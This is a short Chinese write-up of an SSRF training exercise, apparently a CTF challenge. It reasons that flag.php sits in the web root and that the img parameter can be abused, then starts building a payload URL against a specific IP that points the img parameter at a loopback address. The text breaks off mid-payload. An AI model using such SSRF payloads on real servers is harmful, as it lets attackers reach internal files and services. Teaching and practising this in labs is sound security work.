8月3日ssrf漏洞解析训练

第一题 题目: 思路: 点击logo获取以下界面 分析: 本题连接暴漏两个问题,一是flag.php在根目录下(缘由前面的index.php就在根目录下,通常的话二者在同一目录下);二是img参数(所以须要构造对应的img连接,而后造成破损图片并保存)php 步骤一: 构造payload:web http://39.71.44.204:21029/index.php?img=Http://127.
相关文章
相关标签/搜索